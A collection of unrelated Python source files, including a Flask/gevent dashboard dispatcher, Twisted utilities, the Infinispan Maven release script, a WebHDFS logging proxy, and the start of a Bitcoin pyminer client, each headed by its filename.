elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception, e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Clean threads.
"""
client_time, db_time = datetime.utcnow(), get_db_time()
max_offset = timedelta(hours=1, seconds=10)
if db_time - client_time > max_offset or client_time - db_time > max_offset:
logging.critical('Offset between client and db time too big. Stopping Cleaner')
return
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-cleaner', hostname=hostname)
if once:
rule_cleaner(once)
else:
logging.info('Cleaner starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_cleaner, kwargs={'once': once}) for i in xrange(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
dashboard.py
|
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
# TODO: Dashboard needs to be tested.
from IPython import display
import re
import requests
import threading
import os
from . import udash
from gevent.pywsgi import WSGIServer
from flask import Flask
import socket
import random
from string import Template
import logging
log = logging.getLogger(__name__)
app = Flask(__name__)
app.logger.disabled = True
def _build_path(path, base_url=None):
if base_url:
return "{0}/{1}".format(base_url, path)
else:
return path
class AppRunner:
def __init__(self, addr=None, base_url=None, use_relative_links=False):
self.app = DispatcherApp(
base_url=base_url, use_relative_links=use_relative_links
)
self.base_url = base_url
self.use_relative_links = use_relative_links
self._thread = None
if addr is None:
# Allocate port
self.ip = "127.0.0.1"
self.port = -1
max_attempts = 10
for _ in range(max_attempts):
port = random.randint(7000, 7999)
if self._local_port_available(port, rais=False):
self.port = port
log.info("Found open port: {0}".format(port))
break
else: # pragma: no cover
log.info("Port already in use: {0}".format(port))
else: # pragma: no cover
msg = """Could not find open port.
Consider calling `interpret.set_show_addr(("127.0.0.1", 7001))` first.
"""
log.error(msg)
raise RuntimeError(msg)
else:
self.ip = addr[0]
self.port = addr[1]
def _local_port_available(self, port, rais=True):
"""
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", port))
sock.listen(backlog)
sock.close()
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(("::1", port))
sock.listen(backlog)
sock.close()
except socket.error: # pragma: no cover
if rais:
raise RuntimeError(
"The server is already running on port {0}".format(port)
)
else:
return False
return True
def stop(self):
# Shutdown
if self._thread is None:
return True
log.info("Triggering shutdown")
try:
path = _build_path("shutdown")
url = "http://{0}:{1}/{2}".format(self.ip, self.port, path)
r = requests.post(url)
log.debug(r)
except requests.exceptions.RequestException as e: # pragma: no cover
log.info("Dashboard stop failed: {0}".format(e))
return False
if self._thread is not None:
self._thread.join(timeout=5.0)
if self._thread.is_alive():
log.error("Thread still alive despite shutdown called.")
return False
self._thread = None
return True
def _run(self):
try:
class devnull:
write = lambda _: None # noqa: E731
server = WSGIServer((self.ip, self.port), self.app, log=devnull)
self.app.config["server"] = server
server.serve_forever()
except Exception as e: # pragma: no cover
log.error(e, exc_info=True)
def _obj_id(self, obj):
return str(id(obj))
def start(self):
log.info("Running app runner on: {0}:{1}".format(self.ip, self.port))
self._thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def ping(self):
""" Returns true if web service reachable, otherwise False."""
try:
path = _build_path("")
url = "http://{0}:{1}/{2}".format(self.ip, self.port, path)
requests.get(url)
log.info("Dashboard ping succeeded")
return True
except requests.exceptions.RequestException as e: # pragma: no cover
log.info("Dashboard ping failed: {0}".format(e))
return False
def status(self):
status_dict = {}
status_dict["addr"] = self.ip, self.port
status_dict["base_url"] = self.base_url
status_dict["use_relative_links"] = self.use_relative_links
status_dict["thread_alive"] = self._thread.is_alive() if self._thread else False
http_reachable = self.ping()
status_dict["http_reachable"] = http_reachable
return status_dict
def register(self, ctx, **kwargs):
# The path to this instance should be id based.
self.app.register(ctx, **kwargs)
def display_link(self, ctx):
obj_path = self._obj_id(ctx) + "/"
path = (
obj_path
if self.base_url is None
else "{0}/{1}".format(self.base_url, obj_path)
)
start_url = (
"/"
if self.use_relative_links
else "http://{0}:{1}/".format(self.ip, self.port)
)
url = "{0}{1}".format(start_url, path)
log.info("Display URL: {0}".format(url))
return url
def display(self, ctx, width="100%", height=800, open_link=False):
url = self.display_link(ctx)
html_str = "<!-- {0} -->\n".format(url)
if open_link:
html_str += r'<a href="{url}" target="_new">Open in new window</a>'.format(
url=url
)
html_str += """<iframe src="{url}" width={width} height={height} frameBorder="0"></iframe>""".format(
url=url, width=width, height=height
)
display.display_html(html_str, raw=True)
return None
class DispatcherApp:
def __init__(self, base_url=None, use_relative_links=False):
self.base_url = base_url
self.use_relative_links = use_relative_links
self.root_path = "/"
self.shutdown_path = "/shutdown"
self.favicon_path = "/favicon.ico"
self.favicon_res = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "assets", "favicon.ico"
)
self.default_app = Flask(__name__)
self.pool = {}
self.config = {}
if self.base_url is None:
self.app_pattern = re.compile(r"/?(.+?)(/|$)")
else:
self.app_pattern = re.compile(
r"/?(?:{0}/)?(.+?)(/|$)".format(self.base_url)
)
def obj_id(self, obj):
return str(id(obj))
def register(self, ctx, share_tables=None):
ctx_id = self.obj_id(ctx)
if ctx_id not in self.pool:
log.info("Creating App Entry: {0}".format(ctx_id))
ctx_path = (
"/{0}/".format(ctx_id)
if self.base_url is None
else "/{0}/{1}/".format(self.base_url, ctx_id)
)
app = udash.generate_app(
ctx,
{"share_tables": share_tables},
# url_base_pathname=ctx_path,
requests_pathname_prefix=ctx_path,
routes_pathname_prefix=ctx_path,
)
app.css.config.serve_locally = True
app.scripts.config.serve_locally = True
self.pool[ctx_id] = app.server
else:
log.debug("App Entry found: {0}".format(ctx_id))
def __call__(self, environ, start_response):
path_info = environ.get("PATH_INFO", "")
script_name = environ.get("SCRIPT_NAME", "")
log.debug("PATH INFO : {0}".format(path_info))
log.debug("SCRIPT NAME: {0}".format(script_name))
try:
if path_info == self.root_path:
log.info("Root path requested.")
start_response("200 OK", [("content-type", "text/html")])
content = self._root_content()
return [content.encode("utf-8")]
if path_info == self.shutdown_path:
log.info("Shutting down.")
server = self.config["server"]
server.stop()
start_response("200 OK", [("content-type", "text/html")])
return ["Shutdown".encode("utf-8")]
if path_info == self.favicon_path:
log.info("Favicon requested.")
start_response("200 OK", [("content-type", "image/x-icon")])
with open(self.favicon_res, "rb") as handler:
return [handler.read()]
match = re.search(self.app_pattern, path_info)
log.debug("App pattern match: {0}".format(match))
if match is None or self.pool.get(match.group(1), None) is None:
msg = "URL not supported: {0}".format(path_info)
log.error(msg)
start_response("400 BAD REQUEST ERROR", [("content-type", "text/html")])
return [msg.encode("utf-8")]
ctx_id = match.group(1)
log.info("Routing request: {0}".format(ctx_id))
app = self.pool[ctx_id]
if self.base_url and not environ["PATH_INFO"].startswith(
"/{0}".format(self.base_url)
):
log.info("No base url in path. Rewrite to include in path.")
environ["PATH_INFO"] = "/{0}{1}".format(
self.base_url, environ["PATH_INFO"]
)
return app(environ, start_response)
except Exception as e: # pragma: no cover
log.error(e, exc_info=True)
try:
start_response(
"500 INTERNAL SERVER ERROR", [("Content-Type", "text/plain")]
)
except Exception:
pass
return [
"Internal Server Error caught by Dispatcher. See logs if available.".encode(
"utf-8"
)
]
def _root_content(self):
body = r"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Backend Server</title>
</head>
<style>
body {
background-color: white;
margin: 0;
padding: 0;
min-height: 100vh;
}
.banner {
height: 65px;
margin: 0;
padding: 0;
background-color: rgb(20, 100, 130);
box-shadow: rgba(0, 0, 0, 0.1) 1px 2px 3px 0px;
}
.banner h2{
color: white;
margin-top: 0px;
padding: 15px 0;
text-align: center;
font-family: Georgia, Times New Roman, Times, serif;
}
.app {
background-color: rgb(245, 245, 250);
min-height: 100vh;
overflow: hidden;
}
.card-header{
padding-top: 12px;
padding-bottom: 12px;
padding-left: 20px;
padding-right: 20px;
position: relative;
line-height: 1;
border-bottom: 1px solid #eaeff2;
background-color: rgba(20, 100, 130, 0.78);
}
.card-body{
padding-top: 30px;
padding-bottom: 30px;
position: relative;
padding-left: 20px;
padding-right: 20px;
}
.card-title{
display: inline-block;
margin: 0;
color: #ffffff;
}
.card {
border-radius: 3px;
background-color: white;
box-shadow: 0 2px 6px rgba(0, 0, 0, 0.08);
border: 1px solid #d1d6e6;
margin: 30px 20px;
}
.link-container {
text-align: center;
}
.link-container ul {
display: inline-block;
margin: 0px;
padding: 0px;
}
.link-container li {
display: block;
padding: 15px;
}
.center {
position: absolute;
left: 50%;
top: 50%;
-webkit-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
}
</style>
<body>
<div class="app">
<div class="banner"><h2>Backend Server</h2></div>
<div class="card">
<div class="card-header">
<div class="card-title"><div class="center">Active Links</div></div>
</div>
<div class="card-body">
<div class="link-container">
<ul>
$list
</ul>
</div>
</div>
</div>
</div>
</body>
</html>
"""
if not self.pool:
items = "<li>No active links.</li>"
else:
items = "\n".join(
[
r'<li><a href="{0}">{1}</a></li>'.format(
"/{0}/".format(key)
if self.base_url is None
else "/{0}/{1}/".format(self.base_url, key),
key,
)
for key in self.pool.keys()
]
)
content = Template(body).substitute(list=items)
return content
|
utils.py
|
# -*- coding: utf-8 -*-
import datetime
import json
import functools
import Queue
import six
from twisted.application.service import Service
from twisted.internet import defer
from twisted.python import deprecate
from bouser.excs import SerializableBaseException, ExceptionWrapper
from twisted.web.http import Request
from bouser.web.cors import OptionsFinish
__author__ = 'viruzzz-kun'
class RestJsonEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, (datetime.datetime, datetime.date)):
return o.isoformat()
if hasattr(o, '__json__'):
return o.__json__()
if hasattr(o, '__unicode__'):
return o.__unicode__()
if hasattr(o, '__dict__'):
return o.__dict__
return o
def as_json(o):
return json.dumps(o, ensure_ascii=False, cls=RestJsonEncoder, encoding='utf-8').encode('utf-8')
def api_method(func):
@functools.wraps(func)
@defer.inlineCallbacks
def wrapper(*args, **kwargs):
try:
result = yield func(*args, **kwargs)
except OptionsFinish:
# TODO: test it
raise
except SerializableBaseException as e:
result = e
except Exception as e:
result = ExceptionWrapper(e)
if len(args) > 1 and isinstance(args[1], Request):
args[1].setHeader('content-type', 'application/json; charset=utf-8')
defer.returnValue(as_json(result))
return wrapper
def safe_traverse(obj, *args, **kwargs):
"""Безопасное копание вглубь dict'а
@param obj: точка входя для копания
@param *args: ключи, по которым надо проходить
@param default=None: возвращаемое значение, если раскопки не удались
@rtype: any
"""
default = kwargs.get('default', None)
if obj is None:
return default
if len(args) == 0:
raise ValueError(u'len(args) must be > 0')
elif len(args) == 1:
return obj.get(args[0], default)
else:
return safe_traverse(obj.get(args[0]), *args[1:], **kwargs)
def must_be_deferred(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
return defer.maybeDeferred(func, *args, **kwargs)
return wrapper
def safe_int(value):
try:
return int(value)
except ValueError:
return value
@deprecate.deprecated
def get_args(request):
"""
:type request: bouser.web.request.BouserRequest
:param request:
:return:
"""
return request.all_args
def transfer_fields(dest, src, fields):
for name in fields:
setattr(dest, name, getattr(src, name))
class ThreadWrapper(Service):
def __init__(self, name=None):
self.q = Queue.Queue()
self.thread = None
self.name = name
def _cb(self, deferred, result):
"""
Callback to be run on deferred function success
This function is run in Thread
:type deferred: twisted.internet.defer.Deferred
:param deferred: Deferred with callback
:param result: result to pass through
:return:
"""
from twisted.internet import reactor
self.q.task_done()
reactor.callFromThread(deferred.callback, result)
return result
def _eb(self, deferred, failure):
"""
Errback to be run on deferred function fail
This function is run in Thread
:type deferred: twisted.internet.defer.Deferred
:param deferred: Deferred with errback
:param failure: failure to pass through
:return:
"""
from twisted.internet import reactor
self.q.task_done()
reactor.callFromThread(deferred.errback, failure)
return failure
def _run(self):
"""
Wrapper's main loop, target of the Thread.
This function is run in Thread
:return:
"""
while 1:
try:
func, args, kwargs, deferred = self.q.get(timeout=1)
except Queue.Empty:
continue
else:
if not func:
self.thread = None
break
defer.maybeDeferred(
func, *args, **kwargs
).addCallbacks(
self._cb, self._eb, callbackArgs=(deferred,), errbackArgs=(deferred,)
)
def call(self, func, *args, **kwargs):
"""
Call function in Thread's call queue
:param func: callable
:return: Deferred which fires when function execution is done
"""
deferred = defer.Deferred()
self.q.put((func, args, kwargs, deferred))
return deferred
def startService(self):
"""
Start ThreadWrapper
:return:
"""
Service.startService(self)
from threading import Thread
self.thread = Thread(target=self._run, name=self.name)
def stopService(self):
"""
Stop ThreadWrapper
:return:
"""
self.q.put((None, None, None, None))
Service.stopService(self)
def synchronize(self, func):
"""
Decorate function to be called inside this ThreadWrapper
:param func: function
:return: decorated function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
return self.call(func, *args, **kwargs)
return wrapper
def safe_bytes(value):
if isinstance(value, six.text_type):
return value.encode('utf-8', errors='ignore')
elif isinstance(value, six.binary_type):
return value
return str(value)
|
wrap_test.py
|
from functools import wraps
from threading import Thread, Lock
import os
import sys
import time
from pprint import pprint
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from lock import a, b
counter = 0
def synchronized(lock):
""" Synchronization decorator. """
def real_wrapper(function):
@wraps(function)
def wrapper(*args, **kwargs):
lock.acquire()
try:
return function(*args, **kwargs)
finally:
lock.release()
return wrapper
return real_wrapper
@synchronized(a.lock)
def worker():
print("a lock engaged:", a.lock.locked())
pprint(globals())
print("\n------------------------------------\n")
print(locals())
a.count += 1
b = 1
time.sleep(0.1)
threads = []
for i in range(2):
t = Thread(target=worker)
threads.append(t)
t.start()
for t in threads:
t.join()
print(a.count)
print(b)
|
release.py
|
#!/usr/bin/python
import re
import sys
import os
import os.path
import subprocess
import shutil
import tempfile
from datetime import *
from multiprocessing import Process
from utils import *
try:
from xml.etree.ElementTree import ElementTree
except:
prettyprint('''
Welcome to the Infinispan Release Script.
This release script requires that you use at least Python 2.5.0. It appears
that you do not have the ElementTree XML APIs available, which are available
by default in Python 2.5.0.
''', Levels.FATAL)
sys.exit(1)
modules = []
uploader = None
git = None
def get_modules(directory):
'''Analyses the pom.xml file and extracts declared modules'''
tree = ElementTree()
f = directory + "/pom.xml"
if settings['verbose']:
print "Parsing %s to get a list of modules in project" % f
tree.parse(f)
mods = tree.findall(".//{%s}module" % maven_pom_xml_namespace)
for m in mods:
modules.append(m.text)
def help_and_exit():
prettyprint('''
Welcome to the Infinispan Release Script.
%s Usage:%s
$ bin/release.py <version> <branch to tag from> <--mvn-only>
%s E.g.,%s
$ bin/release.py 6.1.1.Beta1 %s<-- this will tag off master.%s
$ bin/release.py 6.1.1.Beta1 6.1.x %s<-- this will use the appropriate branch.%s
$ bin/release.py 6.1.1.Beta1 6.1.x --mvn-only %s<-- this will only tag and release to maven (no distribution).%s
''' % (Colors.yellow(), Colors.end_color(), Colors.yellow(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color()), Levels.INFO)
sys.exit(0)
def validate_version(version):
version_pattern = get_version_pattern()
if version_pattern.match(version):
return version.strip()
else:
prettyprint("Invalid version '"+version+"'!\n", Levels.FATAL)
help_and_exit()
def tag_release(version, branch):
if git.remote_branch_exists():
git.switch_to_branch()
git.create_tag_branch()
else:
prettyprint("Branch %s cannot be found on upstream repository. Aborting!" % branch, Levels.FATAL)
sys.exit(100)
def get_project_version_tag(tree):
return tree.find("./{%s}version" % (maven_pom_xml_namespace))
def get_parent_version_tag(tree):
return tree.find("./{%s}parent/{%s}version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def get_properties_version_tag(tree):
return tree.find("./{%s}properties/{%s}project-version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def write_pom(tree, pom_file):
tree.write("tmp.xml", 'UTF-8')
in_f = open("tmp.xml")
out_f = open(pom_file, "w")
try:
for l in in_f:
newstr = l.replace("ns0:", "").replace(":ns0", "").replace("ns1", "xsi")
out_f.write(newstr)
finally:
in_f.close()
out_f.close()
os.remove("tmp.xml")
if settings['verbose']:
prettyprint(" ... updated %s" % pom_file, Levels.INFO)
def patch(pom_file, version):
'''Updates the version in a POM file. We need to locate //project/parent/version, //project/version and
//project/properties/project-version and replace the contents of these with the new version'''
if settings['verbose']:
prettyprint("Patching %s" % pom_file, Levels.DEBUG)
tree = ElementTree()
tree.parse(pom_file)
need_to_write = False
tags = []
tags.append(get_parent_version_tag(tree))
tags.append(get_project_version_tag(tree))
tags.append(get_properties_version_tag(tree))
for tag in tags:
if tag != None and "-SNAPSHOT" in tag.text:
if settings['verbose']:
prettyprint("%s is %s. Setting to %s" % (str(tag), tag.text, version), Levels.DEBUG)
tag.text=version
need_to_write = True
if need_to_write:
# write to file again!
write_pom(tree, pom_file)
return True
else:
if settings['verbose']:
prettyprint("File doesn't need updating; nothing replaced!", Levels.DEBUG)
return False
def get_poms_to_patch(working_dir):
get_modules(working_dir)
if settings['verbose']:
prettyprint('Available modules are ' + str(modules), Levels.DEBUG)
poms_to_patch = [working_dir + "/pom.xml"]
for m in modules:
poms_to_patch.append(working_dir + "/" + m + "/pom.xml")
# Look for additional POMs that are not directly referenced!
for additionalPom in GlobDirectoryWalker(working_dir, 'pom.xml'):
if additionalPom not in poms_to_patch:
poms_to_patch.append(additionalPom)
return poms_to_patch
def update_versions(base_dir, version):
os.chdir(base_dir)
poms_to_patch = get_poms_to_patch(".")
modified_files = []
for pom in poms_to_patch:
if patch(pom, version):
modified_files.append(pom)
pieces = re.compile('[\.\-]').split(version)
snapshot = pieces[3]=='SNAPSHOT'
final = pieces[3]=='Final'
# Now make sure this goes back into the repository.
git.commit(modified_files, "'Release Script: update versions for %s'" % version)
# And return the next version
if final:
return pieces[0] + '.' + pieces[1] + '.' + str(int(pieces[2])+ 1) + '-SNAPSHOT'
else:
return None
def get_module_name(pom_file):
tree = ElementTree()
tree.parse(pom_file)
return tree.findtext("./{%s}artifactId" % maven_pom_xml_namespace)
def upload_artifacts(dist_dir, version):
"""Artifacts gets rsync'ed to filemgmt.jboss.org, in the downloads_htdocs/infinispan directory"""
tempdir = tempfile.mkdtemp(prefix = '.tmp', dir='.')
os.mkdir("%s/%s" % (tempdir,version))
prettyprint("Copying from %s to %s" % (dist_dir, version), Levels.INFO)
for item in os.listdir(dist_dir):
full_name = "%s/%s" % (dist_dir, item)
if item.strip().lower().endswith(".zip") and os.path.isfile(full_name):
shutil.copy2(full_name, "%s/%s" % (tempdir,version))
uploader.upload_rsync("%s/%s" % (tempdir,version), "infinispan@filemgmt.jboss.org:/downloads_htdocs/infinispan")
shutil.rmtree(tempdir, ignore_errors = True)
def unzip_archive(version):
os.chdir("./distribution/target/distribution")
## Grab the distribution archive and un-arch it
shutil.rmtree("infinispan-%s-all" % version, ignore_errors = True)
if settings['verbose']:
subprocess.check_call(["unzip", "infinispan-%s-all.zip" % version])
else:
subprocess.check_call(["unzip", "-q", "infinispan-%s-all.zip" % version])
def prepare_docs(base_dir, version):
os.chdir("%s/distribution/target/distribution/infinispan-%s-all/docs" % (base_dir, version))
## "Fix" the docs to use the appropriate analytics tracker ID
subprocess.check_call(["%s/bin/updateTracker.sh" % base_dir])
os.mkdir("pdf")
subprocess.check_call(["mvn", "org.apache.maven.plugins:maven-dependency-plugin:2.10:unpack", "-DoutputDirectory=pdf", "-DrepoUrl=https://repository.jboss.org/nexus/content/groups/public-jboss/", "-Dartifact=org.infinispan:infinispan-docs:%s:zip:pdf" % (version)])
def upload_docs(base_dir, version):
"""Javadocs and PDFs get rsync'ed to filemgmt.jboss.org, in the docs_htdocs/infinispan directory"""
version_short = get_version_major_minor(version)
os.mkdir(version_short)
os.rename("api", "%s/apidocs" % version_short)
os.rename("pdf", "%s/pdf" % version_short)
## rsync this stuff to filemgmt.jboss.org
uploader.upload_rsync(version_short, "infinispan@filemgmt.jboss.org:/docs_htdocs/infinispan")
os.chdir(base_dir)
def upload_schema(base_dir, version):
"""Schema gets rsync'ed to filemgmt.jboss.org, in the docs_htdocs/infinispan/schemas and schema_htdoc/infinispan directories"""
os.chdir("%s/distribution/target/distribution/infinispan-%s-all/schema" % (base_dir, version))
## rsync this stuff to filemgmt.jboss.org, we put it in the orginal location (docs/infinispan/schemas) and the new location (schema/infinispan)
uploader.upload_rsync('.', "infinispan@filemgmt.jboss.org:/docs_htdocs/infinispan/schemas")
uploader.upload_rsync('.', "infinispan@filemgmt.jboss.org:/schema_htdocs/infinispan/")
## now the schema docs
version_short = get_version_major_minor(version)
os.chdir("%s/distribution/target/site" % base_dir)
os.mkdir(version_short)
os.rename("configdocs", "%s/configdocs" % version_short)
uploader.upload_rsync(version_short, "infinispan@filemgmt.jboss.org:/docs_htdocs/infinispan")
os.chdir(base_dir)
def do_task(target, args, async_processes):
if settings['multi_threaded']:
async_processes.append(Process(target = target, args = args))
else:
target(*args)
### This is the starting place for this script.
def release():
global settings
global uploader
global git
assert_python_minimum_version(2, 5)
require_settings_file()
# We start by determining whether the version passed in is a valid one
if len(sys.argv) < 2:
help_and_exit()
base_dir = os.getcwd()
version = validate_version(sys.argv[1])
branch = "master"
mvn_only = False
if len(sys.argv) > 2:
if sys.argv[2].startswith("--mvn-only"):
mvn_only = True
else:
branch = sys.argv[2]
if len(sys.argv) > 3:
if sys.argv[3].startswith("--mvn-only"):
mvn_only = True
else:
prettyprint("Unknown argument %s" % sys.argv[3], Levels.WARNING)
help_and_exit()
prettyprint("Releasing Infinispan version %s from branch '%s'" % (version, branch), Levels.INFO)
sure = input_with_default("Are you sure you want to continue?", "N")
if not sure.upper().startswith("Y"):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
prettyprint("OK, releasing! Please stand by ...", Levels.INFO)
## Set up network interactive tools
if settings['dry_run']:
# Use stubs
prettyprint("*** This is a DRY RUN. No changes will be committed. Used to test this release script only. ***", Levels.DEBUG)
prettyprint("Your settings are %s" % settings, Levels.DEBUG)
uploader = DryRunUploader()
else:
uploader = Uploader()
git = Git(branch, version)
if not git.is_upstream_clone():
proceed = input_with_default('This is not a clone of an %supstream%s Infinispan repository! Are you sure you want to proceed?' % (Colors.UNDERLINE, Colors.END), 'N')
if not proceed.upper().startswith('Y'):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
## Make sure we don't include un-needed content in the release
prettyprint("Step 1: Cleaning up working directory (un-tracked and modified files)", Levels.INFO)
git.clean_release_directory()
prettyprint("Step 1: Complete", Levels.INFO)
## Release order:
# Step 1: Tag in Git
prettyprint("Step 2: Tagging %s in git as %s" % (branch, version), Levels.INFO)
tag_release(version, branch)
prettyprint("Step 2: Complete", Levels.INFO)
# Step 2: Update version in tagged files
prettyprint("Step 3: Updating version number in source files", Levels.INFO)
version_next = update_versions(base_dir, version)
prettyprint("Step 3: Complete", Levels.INFO)
# Step 3: Build and test
prettyprint("Step 4: Build and test", Levels.INFO)
maven_build_distribution(version)
prettyprint("Step 4: Complete", Levels.INFO)
if not mvn_only:
async_processes = []
##Unzip the newly built archive now
unzip_archive(version)
# Step 4: Update javadoc Google Analytics tracker
prettyprint("Step 5: Prepare docs", Levels.INFO)
prepare_docs(base_dir, version)
prettyprint("Step 5: Complete", Levels.INFO)
# Step 5: Upload docs to FTP
prettyprint("Step 6: Uploading docs", Levels.INFO)
do_task(upload_docs, [base_dir, version], async_processes)
prettyprint("Step 6: Complete", Levels.INFO)
prettyprint("Step 7: Uploading Artifacts", Levels.INFO)
do_task(upload_artifacts, ["%s/distribution/target/distribution" % base_dir, version], async_processes)
do_task(upload_artifacts, ["%s/as-modules/client/target/distribution" % base_dir, version], async_processes)
do_task(upload_artifacts, ["%s/as-modules/embedded/target/distribution" % base_dir, version], async_processes)
do_task(upload_artifacts, ["%s/server/integration/target/distribution" % base_dir, version], async_processes)
prettyprint("Step 7: Complete", Levels.INFO)
prettyprint("Step 8: Uploading to configuration XML schema", Levels.INFO)
do_task(upload_schema, [base_dir, version], async_processes)
prettyprint("Step 8: Complete", Levels.INFO)
## Wait for processes to finish
for p in async_processes:
p.start()
for p in async_processes:
p.join()
## Tag the release
git.tag_for_release()
step_no=9
if mvn_only:
step_no=5
# Switch back to the branch being released
git.switch_to_branch()
# Update to next version
if version_next is not None:
prettyprint("Step %s: Updating version number for next release" % step_no, Levels.INFO)
update_versions(base_dir, version_next)
prettyprint("Step %s: Complete" % step_no, Levels.INFO)
if not settings['dry_run']:
git.push_tag_to_origin()
if version_next is not None:
git.push_branch_to_origin()
git.cleanup()
else:
prettyprint("In dry-run mode. Not pushing tag to remote origin and not removing temp release branch %s." % git.working_branch, Levels.DEBUG)
prettyprint("\n\n\nDone! Now all you need to do is the remaining post-release tasks as outlined in https://mojo.redhat.com/docs/DOC-60994", Levels.INFO)
if __name__ == "__main__":
release()
|
servers.py
|
import SocketServer
import mitm
class SimpleTCPServer(SocketServer.TCPServer):
def start_foreground(self):
self.serve_forever()
class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
daemon_threads = mitm.KILL_THREADS_WHEN_MAIN_ENDS
def start_background(self):
mitm.Thread(target=self.serve_forever).start()
def start_foreground(self):
self.serve_forever()
|
webhdfs_proxy.py
|
#!/usr/bin/python3 -u
import threading
import time
import subprocess
import json
import http.server
import http.client
import urllib.parse
class ChunkedWriter:
def __init__(self, wfile):
self.wfile = wfile
def write(self, data):
self.wfile.write(f'{len(data):x}\r\n'.encode())
self.wfile.write(data)
self.wfile.write('\r\n'.encode())
def close(self):
self.wfile.write('0\r\n\r\n'.encode())
logging_lock = threading.Lock()
logging_file = None
hdfs_nn_port = 9870
hdfs_dn_port = 9864
proxy_nn_port = 9860
proxy_dn_port = 9859
hdfs_ip = 'qflock-storage'
total_bytes = 0
class NNRequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def log(self, msg):
logging_lock.acquire()
print(msg)
logging_file.write(msg + '\n')
logging_file.flush()
logging_lock.release()
def send_hdfs_request(self):
conn = http.client.HTTPConnection(f'{hdfs_ip}:{hdfs_nn_port}')
conn.request("GET", self.path, '', self.headers)
response = conn.getresponse()
data = response.read()
conn.close()
return response, data
def do_GET(self):
return self.forward_to_hdfs()
def forward_to_hdfs(self):
global total_bytes
resp, data = self.send_hdfs_request()
total_bytes += len(data)
self.log(f'"NN", "{self.path}", {len(data)}, {total_bytes} ')
self.send_response(resp.status, resp.reason)
transfer_encoding = None
for h in resp.headers.items():
if h[0] == 'Transfer-Encoding':
transfer_encoding = h[1]
if h[0] == 'Location' and resp.status == 307: # Temporary redirect
ip = self.connection.getsockname()[0]
location = h[1].replace(f':{hdfs_dn_port}', f':{proxy_dn_port}', 1)
# print(location)
self.send_header(h[0], location)
else:
self.send_header(h[0], h[1])
self.end_headers()
if transfer_encoding == 'chunked':
writer = ChunkedWriter(self.wfile)
writer.write(data)
writer.close()
else:
self.wfile.write(data)
self.wfile.flush()
class DNRequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def log(self, msg):
logging_lock.acquire()
print(msg)
logging_file.write(msg + '\n')
logging_file.flush()
logging_lock.release()
def send_hdfs_request(self):
conn = http.client.HTTPConnection(f'{hdfs_ip}:{hdfs_dn_port}')
conn.request("GET", self.path, '', self.headers)
response = conn.getresponse()
data = response.read()
conn.close()
return response, data
def do_GET(self):
return self.forward_to_hdfs()
def forward_to_hdfs(self):
global total_bytes
resp, data = self.send_hdfs_request()
total_bytes += len(data)
self.log(f'"DN", "{self.path}", {len(data)}, {total_bytes} ')
self.send_response(resp.status, resp.reason)
transfer_encoding = None
for h in resp.headers.items():
if h[0] == 'Transfer-Encoding':
transfer_encoding = h[1]
self.send_header(h[0], h[1])
self.end_headers()
if transfer_encoding == 'chunked':
writer = ChunkedWriter(self.wfile)
writer.write(data)
writer.close()
else:
self.wfile.write(data)
self.wfile.flush()
def start_server(port, handler):
server = http.server.HTTPServer(('0.0.0.0', port), handler)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
def get_storage_ip():
result = subprocess.run('docker network inspect qflock-net'.split(' '), stdout=subprocess.PIPE)
d = json.loads(result.stdout)
for c in d[0]['Containers'].values():
print(c['Name'], c['IPv4Address'].split('/')[0])
if c['Name'] == 'qflock-storage':
return c['IPv4Address'].split('/')[0]
return None
if __name__ == '__main__':
logging_file = open('webhdfs_proxy.log', 'w')
# hdfs_ip = get_storage_ip()
print(f'Listening to ports:{proxy_nn_port}, {proxy_dn_port} HDFS:{hdfs_ip}')
# start_server(proxy_nn_port, NNRequestHandler)
th = threading.Thread(target=start_server, args=(proxy_nn_port, NNRequestHandler), daemon=True).start()
start_server(proxy_dn_port, DNRequestHandler)
logging_file.close()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
